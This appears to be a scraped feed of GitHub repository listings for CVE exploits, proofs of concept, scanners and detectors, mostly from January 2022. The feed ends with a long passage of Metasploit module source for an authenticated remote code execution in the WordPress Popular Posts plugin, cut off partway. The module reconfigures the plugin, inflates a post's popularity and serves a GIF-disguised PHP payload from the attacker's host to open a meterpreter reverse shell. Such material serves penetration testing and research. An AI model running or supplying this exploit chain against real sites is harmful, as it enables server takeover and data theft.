no description : aymenbouferroum/CVE-2021-43798_exploit create time: 2022-01-18T21:04:39Z
Finds an identifiable hash value for each version of GitLab vulnerable to CVE-2021-22205 (https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json) for use in fingerprinting. : GitLab-Red-Team/cve-2021-22205-hash-harvester create time: 2022-01-18T20:40:55Z
Exploit for CVE-2021-32099 : nikn0laty/CVE-2021-32099_exploit create time: 2022-01-18T19:29:55Z
POC for Infamous Log4j CVE-2021-44228 : ColdFusionX/CVE-2021-44228-Log4Shell-POC create time: 2022-01-18T19:22:38Z
cf8-upload.py | CVE-2009-2265 : 0zvxr/CVE-2009-2265 create time: 2022-01-14T17:34:28Z
Apache log4j2 CVE-20210-44228 poc : c4dr01d/CVE-2021-44228-poc create time: 2021-12-23T03:18:26Z
no description : x41sec/CVE-2021-34600 create time: 2022-01-17T16:08:17Z
Proof of concept of CVE-2022-21907 Double Free in http.sys driver, triggering a kernel crash on IIS servers : p0dalirius/CVE-2022-21907-http.sys create time: 2022-01-17T15:42:37Z
no description : fimtow/CVE-2021-24750 create time: 2022-01-14T21:19:43Z
本项目并不刻意搜集 POC 或 EXP,主要以CVE-2022为关键词,包含但不限于漏洞资讯、漏洞复现、漏洞分析、漏洞验证、漏洞利用 : binganao/vulns-2022 create time: 2022-01-15T00:31:06Z
Terraform and Docker resources for quickly spinning up a test of CVE-2021-4428 : z3bul0n/log4jtest create time: 2022-01-18T00:09:11Z
WordPress Core 5.8.2 - 'WP_Query' SQL Injection : TAPESH-TEAM/CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection create time: 2022-01-18T01:05:04Z
Apache Dubbo Hessian2 CVE-2021-43297 demo : longofo/Apache-Dubbo-Hessian2-CVE-2021-43297 create time: 2022-01-17T17:52:34Z
A simple script to check for ProxyShell : jrgdiaz/ProxyShell-CVE-2021-34473 create time: 2022-01-17T15:12:58Z
CVE-2022-21907 : xiska62314/CVE-2022-21907 create time: 2022-01-17T13:42:44Z
Static detection of vulnerable log4j librairies on Windows members of an AD domain. : arnaudluti/PS-CVE-2020-44228 create time: 2022-01-17T12:46:20Z
CVE-2022-21907 : xiska62314/CVE-2022-21907 create time: 2022-01-17T13:18:08Z
CVE-2022-0236 : xiska62314/CVE-2022-0236 create time: 2022-01-17T12:56:19Z
CVE-2021-43297 POC : bitterzzZZ/CVE-2021-43297-POC create time: 2022-01-17T12:26:18Z
no description : KasunPriyashan/Y2S1-Project-Linux-Exploitaion-using-CVE-2016-5195-Vulnerability create time: 2022-01-17T08:45:28Z
no description : nazgul6092/2nd-Year-Project-01-Linux-Exploitation-using-CVE-20166-5195 create time: 2022-01-15T13:30:15Z
no description : artsking/linux-4.19.72_CVE-2020-14386_extrapatch create time: 2022-01-17T03:55:23Z
测试各位cve检测的灵敏性 : Fanc1er/CVE-2022-21918 create time: 2022-01-17T03:20:44Z
Windows HTTP协议栈远程代码执行漏洞 CVE-2022-21907 : antx-code/CVE-2022-21907 create time: 2022-01-17T02:28:50Z
no description : qurbat/CVE-2022-0236 create time: 2022-01-16T09:52:28Z
This repo contains dumped flash partitions with firmware version vulnerable to CVE-2019-17147, and some useful binaries to downgrade and debug your WR841N router. : DrmnSamoLiu/CVE-2019-17147_Practice_Material create time: 2022-01-16T07:08:57Z
An exploit/PoC for CVE-2021-42237 : PinkDev1/CVE-2021-42237 create time: 2022-01-16T05:22:30Z
CVE-2021-28476: Hyper-V vmswitch.sys arbitrary pointer dereference from guest VM : australeo/CVE-2021-28476 create time: 2022-01-16T02:45:26Z
This repository detects a system vulnerable to CVE-2022-21907 and protects against this vulnerability if desired. : mauricelambert/CVE-2022-21907 create time: 2022-01-15T20:50:25Z
CVE-2021-46080 - A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. An successful CSRF attacks leads to Stored Cross Site Scripting Vulnerability. : plsanu/CVE-2021-46080 create time: 2022-01-14T21:45:58Z
CVE-2021-46079 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to Html Injection. : plsanu/CVE-2021-46079 create time: 2022-01-14T21:26:02Z
CVE-2021-46080 - A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. An successful CSRF attacks leads to Stored Cross Site Scripting Vulnerability. : plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS create time: 2021-12-28T18:23:42Z
CVE-2021-46079 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to Html Injection. : plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection create time: 2021-12-28T18:17:36Z
CVE-2021-46078 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability. : plsanu/CVE-2021-46078 create time: 2022-01-14T20:49:42Z
CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 is vulnerable to File upload. An attacker can upload a malicious php file in multiple endpoints it leading to Code Execution. : plsanu/CVE-2021-46076 create time: 2022-01-14T20:28:01Z
CVE-2021-46078 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability. : plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting create time: 2021-12-28T15:35:20Z
CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 is vulnerable to File upload. An attacker can upload a malicious php file in multiple endpoints it leading to Code Execution. : plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution create time: 2021-12-28T15:00:17Z
CVE-2021-46075 - A Privilege Escalation vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. Staff account users can access the admin resources and perform CRUD Operations. : plsanu/CVE-2021-46075 create time: 2022-01-14T20:15:28Z
CVE-2021-46074 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Settings Section in login panel. : plsanu/CVE-2021-46074 create time: 2022-01-14T20:01:50Z
CVE-2021-46073 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel. : plsanu/CVE-2021-46073 create time: 2022-01-14T19:49:07Z
CVE-2021-46072 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel. : plsanu/CVE-2021-46072 create time: 2022-01-14T19:34:50Z
CVE-2021-46075 - A Privilege Escalation vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. Staff account users can access the admin resources and perform CRUD Operations. : plsanu/Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations create time: 2021-12-28T14:46:13Z
CVE-2021-46074 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Settings Section in login panel. : plsanu/Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS create time: 2021-12-28T14:37:00Z
CVE-2021-46073 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel. : plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS create time: 2021-12-28T14:29:44Z
CVE-2021-46072 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel. : plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS create time: 2021-12-28T14:22:43Z
CVE-2021-46071 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel. : plsanu/CVE-2021-46071 create time: 2022-01-14T19:09:36Z
CVE-2021-46070 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service Requests Section in login panel. : plsanu/CVE-2021-46070 create time: 2022-01-14T18:54:29Z
CVE-2021-46069 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel. : plsanu/CVE-2021-46069 create time: 2022-01-14T18:27:00Z
CVE-2021-46071 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel. : plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS create time: 2021-12-28T14:09:54Z
CVE-2021-46070 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service Requests Section in login panel. : plsanu/Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS create time: 2021-12-28T14:00:52Z
CVE-2021-46069 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel. : plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS create time: 2021-12-28T13:47:59Z
CVE-2021-46068 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel. : plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS create time: 2021-12-27T22:07:08Z
CVE-2021-46067 - In Vehicle Service Management System 1.0 an attacker can steal the cookies leading to Full Account Takeover. : plsanu/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover create time: 2021-12-27T21:15:41Z
CVE-2021-45745 - A Stored Cross Site Scripting (XSS) vulnerability exists in Bludit 3.13.1 via the About Plugin in login panel. Application stores attacker injected dangerous JavaScript in to the database and executes without validating. : plsanu/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS create time: 2021-12-19T17:54:55Z
CVE-2021-45744 - A Stored Cross Site Scripting (XSS) vulnerability exists in bludit 3.13.1 via the TAGS section in login panel. Application stores attacker injected dangerous JavaScript in to the database and executes without validating. : plsanu/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS create time: 2021-12-19T17:50:15Z
CVE-2021-46068 : plsanu/CVE-2021-46068 create time: 2022-01-14T18:04:01Z
CVE-2021-46067 : plsanu/CVE-2021-46067 create time: 2022-01-14T17:19:09Z
CVE-2021-45745 : plsanu/CVE-2021-45745 create time: 2022-01-14T16:52:08Z
This Pwsh script run AppScan Standard scans against a list of web sites (URLs.txt) checking for Log4J (CVE-2021-44228) vulnerability : jrocia/Search-log4Jvuln-AppScanSTD create time: 2022-01-14T16:47:20Z
Proof Of Concept code for OctoberCMS Auth Bypass CVE-2021-32648 : Immersive-Labs-Sec/CVE-2021-32648 create time: 2022-01-14T15:50:11Z
CVE-2021-45744 : plsanu/CVE-2021-45744 create time: 2022-01-14T15:36:21Z
no description : puckiestyle/CVE-2018-16341 create time: 2022-01-14T13:38:04Z
For code auit and CVE-2020-21378 repetition : sukusec301/SeaCMS-v10.1- create time: 2022-01-14T11:17:26Z
no description : BishopFox/CVE-2021-35211 create time: 2022-01-14T05:52:17Z
JWT Key Confusion PoC (CVE-2015-9235) Written for the Hack the Box challenge - Under Construction : aalex954/jwt-key-confusion-poc create time: 2022-01-13T23:09:13Z
This work includes testing and improvement tools for CVE-2021-44228(log4j). : sdogancesur/log4j_github_repository create time: 2022-01-13T21:16:26Z
CVE-2021-44228 : eliadbz/log4shell create time: 2022-01-13T20:26:24Z
CVE-2021-38141 in OpenEMPI 4.04 : connellmcg/CVE-2021-38141 create time: 2022-01-13T16:19:45Z
no description : solitarysp/Log4j-CVE-2021-44228 create time: 2022-01-13T13:46:12Z
Script - Workaround instructions to address CVE-2021-44228 in vCenter Server : Fazmin/vCenter-Server-Workaround-Script-CVE-2021-44228 create time: 2021-12-17T05:14:05Z
POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL(Object-Graph Navigation Language) Injection Vulneralibity. : antx-code/CVE-2021-26084 create time: 2022-01-13T06:29:51Z
A potential Denial of Service issue in protobuf-java high severity GitHub Reviewed Published 5 days ago in protocolbuffers/protobuf • Updated yesterday Vulnerability details Dependabot alerts 2 Package com.google.protobuf:protobuf-java (maven) Affected versions < 3.16.1 >= 3.18.0, < 3.18.2 >= 3.19.0, < 3.19.2 Patched versions 3.16.1 3.18.2 3.19.2 Package com.google.protobuf:protobuf-kotlin (maven) Affected versions >= 3.18.0, < 3.18.2 >= 3.19.0, < 3.19.2 Patched versions 3.18.2 3.19.2 Package google-protobuf (RubyGems) Affected versions < 3.19.2 Patched versions 3.19.2 Description Summary A potential Denial of Service issue in protobuf-java was discovered in the parsing procedure for binary data. Reporter: OSS-Fuzz Affected versions: All versions of Java Protobufs (including Kotlin and JRuby) prior to the versions listed below. Protobuf "javalite" users (typically Android) are not affected. Severity CVE-2021-22569 High - CVSS Score: 7.5, An implementation weakness in how unknown fields are parsed in Java. A small (~800 KB) malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated GC pauses. Proof of Concept For reproduction details, please refer to the oss-fuzz issue that identifies the specific inputs that exercise this parsing weakness. Remediation and Mitigation Please update to the latest available versions of the following packages: protobuf-java (3.16.1, 3.18.2, 3.19.2) protobuf-kotlin (3.18.2, 3.19.2) google-protobuf [JRuby gem only] (3.19.2) References GHSA-wrvw-hg22-4m67 https://nvd.nist.gov/vuln/detail/CVE-2021-22569 https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=39330 https://cloud.google.com/support/bulletins#gcp-2022-001 : Mario-Kart-Felix/A-potential-Denial-of-Service-issue-in-protobuf-java create time: 2022-01-13T03:33:54Z
Explanation of CVE-2021-45046 for classroom use : taise-hub/log4j-poc create time: 2022-01-13T03:02:47Z
This repository was created with the purpose to make it easy for organizations and individuals to study and research log4jshell vulnerability code name CVE-2021-44228. : adamtheapiguy/log4jshellPoC create time: 2022-01-13T01:53:17Z
no description : artsking/linux-4.19.72_CVE-2020-14386 create time: 2022-01-13T02:05:23Z
Démo du fonctionnement de log4shell (CVE-2021-44228) : jxerome/log4shell create time: 2022-01-12T23:44:20Z
School project - Please use other repos for actual testing : norrig/CVE-2021-41773-exploiter create time: 2022-01-12T17:42:36Z
no description : SABI-Ensimag/CVE-2019-18276 create time: 2022-01-12T11:40:57Z
CVE-2021-32099 : ibnuuby/CVE-2021-32099 create time: 2022-01-12T11:48:34Z
no description : artsking/linux-4.19.72_CVE-2020-14386 create time: 2022-01-12T10:41:44Z
CVE-2020-15261 test : yaoyao-cool/CVE-2020-15261 create time: 2022-01-12T10:00:39Z
no description : aazhuliang/CVE-2021-31956-EXP create time: 2022-01-11T16:03:38Z
cups-root-file-read.sh | CVE-2012-5519 : 0zvxr/CVE-2012-5519 create time: 2022-01-07T15:39:47Z
Powershell implemetation of CVE-2020-7352 : szerszen199/PS-CVE-2020-7352 create time: 2022-01-05T00:11:58Z
Just for HTB : zjicmDarkWing/CVE-2021-32099 create time: 2022-01-11T08:14:06Z
Experimental exploit for Log4Shell : c4dr01d/CVE-2021-44228 create time: 2022-01-10T04:55:23Z
a cve crawler for 2021 : song856854132/scrapy_CVE2021 create time: 2022-01-09T15:39:53Z
no description : Nivaskumark/CVE-2021-40490_kernel_v4.19.72 create time: 2022-01-11T05:42:58Z
no description : Nivaskumark/CVE-2021-0434_packages_apps_Settings create time: 2022-01-11T05:14:06Z
no description : Nivaskumark/CVE-2021-0434_packages_apps_Settings_beforefix create time: 2022-01-11T04:51:23Z
Log4j version 1.2.17 without the offending class responsible for CVE-2021-4104. : open-AIMS/log4j create time: 2022-01-10T09:01:46Z
CVE-2021-44228 : mr-vill4in/log4j-fuzzer create time: 2022-01-08T00:28:32Z
An exploit for CVE-2021-20038 : jbaines-r7/badblood create time: 2022-01-11T02:25:25Z
no description : marcinguy/CVE-2021-39623 create time: 2022-01-10T19:25:28Z
no description : Veids/CVE-2020-3452_auto create time: 2022-01-10T16:56:40Z
CVE-2022-21660 : UzJu/Gin-Vue-admin-poc-CVE-2022-21660 create time: 2022-01-10T05:50:35Z
CVE-2021-41277 can be extended to an SSRF : sasukeourad/CVE-2021-41277_SSRF create time: 2022-01-10T01:52:10Z
no description : cryptoforcecommand/log4j-cve-2021-44228 create time: 2022-01-09T08:22:24Z
no description : gnaiq/cve-2022-2222 create time: 2022-01-10T02:23:06Z
no description : cybersecurityworks553/CVE-2021-42392-Detect create time: 2022-01-09T16:23:16Z
This Log4j RCE exploit originated from https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce : maximofernandezriera/CVE-2021-44228 create time: 2022-01-09T13:38:38Z
no description : MichaelsPlayground/CVE-2019-9465 create time: 2022-01-08T22:25:43Z
2022年Java应用程序的CVE漏洞 : HackJava/CVE2022 create time: 2022-01-08T15:28:02Z
no description : alexpena5635/CVE-2021-44228_scanner-main-Modified- create time: 2022-01-05T00:14:08Z
一键批量检测poc : yggcwhat/CVE-2021-45232 create time: 2022-01-08T08:16:06Z
CVE-2021-45232批量一键检测 : yggcwhat/Demo create time: 2022-01-08T07:42:43Z
CVE-2021-44270 : pinpinsec/Anviz-Access-Control-Authentication-Bypass create time: 2021-11-23T15:04:23Z
no description : 1nf1n17yk1ng/CVE-2018-16763 create time: 2022-01-08T07:15:24Z
A vulnerable Java based REST API for demonstrating CVE-2021-44228 (log4shell). : nix-xin/vuln4japi create time: 2022-01-08T06:45:44Z
no description : rodpwn/CVE-2021-43798-mass_scanner create time: 2022-01-08T02:58:18Z
Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more. : puzzlepeaches/Log4jHorizon create time: 2022-01-05T22:25:42Z
Log4jshell - CVE-2021-44228 : Vulnmachines/log4jshell_CVE-2021-44228 create time: 2022-01-07T09:56:30Z
CVE-2021-42013-exp : rnsss/CVE-2021-42013 create time: 2022-01-07T03:12:45Z
no description : Yuji-Kakeya/log4j-CVE-2021-45046-poc create time: 2022-01-05T04:13:59Z
Exploiting: CVE-2021-41349 : exploit-io/CVE-2021-41349 create time: 2022-01-06T09:44:15Z
Grafana8.x 任意文件读取 : rnsss/CVE-2021-43798-poc create time: 2022-01-06T09:25:35Z
no description : lsw29475/CVE-2021-39863 create time: 2021-12-12T13:27:16Z
no description : gnaiq/cve2022123 create time: 2022-01-06T07:58:57Z
no description : gnaiq/cve-2022-4444 create time: 2022-01-06T07:22:47Z
no description : Xifeng2009/go_get_cve_2018_6574 create time: 2022-01-06T02:56:07Z
运用golang写的grafana批量验证脚本,内置48个poc : light-Life/CVE-2021-43798 create time: 2022-01-06T01:54:26Z
no description : timb-machine-mirrors/CVE-2021-28482 create time: 2022-01-05T23:26:58Z
no description : timb-machine-mirrors/CVE-2021-22005 create time: 2022-01-05T23:22:08Z
no description : timb-machine-mirrors/CVE-2021-42321_poc create time: 2022-01-05T23:15:55Z
Directory of all CVEs from 2019 to 2021. : reconmap/vulnerability-data create time: 2020-09-25T18:29:45Z
latest developments and resources on log4j vulnerability CVE-2021-44228 : cryptoforcecommand/log4j-CVE-2021-44228 create time: 2022-01-05T21:00:44Z
Log4j2 LDAP 취약점 테스트 (CVE-2021-44228) : mklinkj/log4j2-test create time: 2022-01-03T04:36:41Z
A simple program to demonstrate how Log4j vulnerability can be exploited ( CVE-2021-44228 ) : ChandanShastri/Log4j_Vulnerability_Demo create time: 2022-01-05T15:24:20Z
Details,PoC and patches for CVE-2021-45383 & CVE-2021-45384 : nt1dr/CVE-2021-45383 create time: 2022-01-05T12:56:23Z
Backdoor detection for VMware view : mr-r3b00t/CVE-2021-44228 create time: 2022-01-05T11:27:16Z
Config files for my GitHub profile. : cvelez2002/cvelez2002 create time: 2022-01-05T08:33:27Z
no description : Kuibagit/CVE-2021-45232-RCE create time: 2022-01-05T09:07:35Z
A vulnerable web app for log4j2 RCE(CVE-2021-44228) exploit test. : kanitan/log4j2-web-vulnerable create time: 2022-01-05T08:13:32Z
no description : gnaiq/CVE-2022-1234 create time: 2022-01-05T07:07:41Z
CVE-2021-45232-RCE-多线程批量漏洞检测 : GYLQ/CVE-2021-45232-RCE create time: 2022-01-05T04:13:10Z
PoC for CVE-2019-5736 : Frichetten/CVE-2019-5736-PoC create time: 2019-02-13T05:26:32Z
Searchable page for CISA Log4j (CVE-2021-44228) Affected Vendor & Software List : 4jfinder/4jfinder.github.io create time: 2022-01-04T03:37:03Z
CVE-2021-42342 RCE : Mr-xn/CVE-2021-42342 create time: 2022-01-04T14:48:59Z
no description : w1023913214/CVE-2022 create time: 2022-01-04T13:51:54Z
the name of virus is the detection of microsoft defender, is the tipic antivirus : Malware-S/Exploit-Win32.CVE-2017-0147.A create time: 2022-01-04T10:25:39Z
PoC Site for tsunami-security-scanner-plugins. : PfalzPrince/CVE-2021-28750 create time: 2022-01-04T08:05:03Z
POC for CVE-2021-22214: Gitlab SSRF : kh4sh3i/GitLab-SSRF-CVE-2021-22214 create time: 2022-01-04T05:52:57Z
Atmail XSS-RCE-CSRF Exploit Chain : AndrewTrube/CVE-2012-2593 create time: 2022-01-04T02:47:46Z
Bassmaster Plugin NodeJS RCE : AndrewTrube/CVE-2014-7205 create time: 2022-01-04T02:59:32Z
the name of virus is the detection of microsoft defender, is the tipic antivirus : Malware-S/Exploit-Win32.CVE-2012-0158.F.doc create time: 2022-01-03T21:13:13Z
Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8. : LongWayHomie/CVE-2021-43857 create time: 2022-01-03T16:47:42Z
no description : khuntor/cve-2021-43858 create time: 2022-01-03T14:12:35Z
A sample POC to test CVE-2021-30853 : shubham0d/CVE-2021-30853 create time: 2022-01-02T20:24:11Z
no description : thl-cmk/CVE-2021-44228-log4j-check_mk-plugin create time: 2021-12-19T10:46:53Z
CVE-2016-10555 PoC code : scent2d/PoC-CVE-2016-10555 create time: 2022-01-02T15:02:59Z
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status("Received unexpected #{request.method} request") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? ' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="([^"])/ =~ res.body Regexp.last_match(1) end def change_settings(cookie, token) vprint_status('Updating popular posts settings for images') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /Settings saved/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit", 'action' => 'toggle-custom-fields' } ) /name="_ajax_nonce-add-meta" value="([^"])/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /name="_ajax_nonce-add-meta" 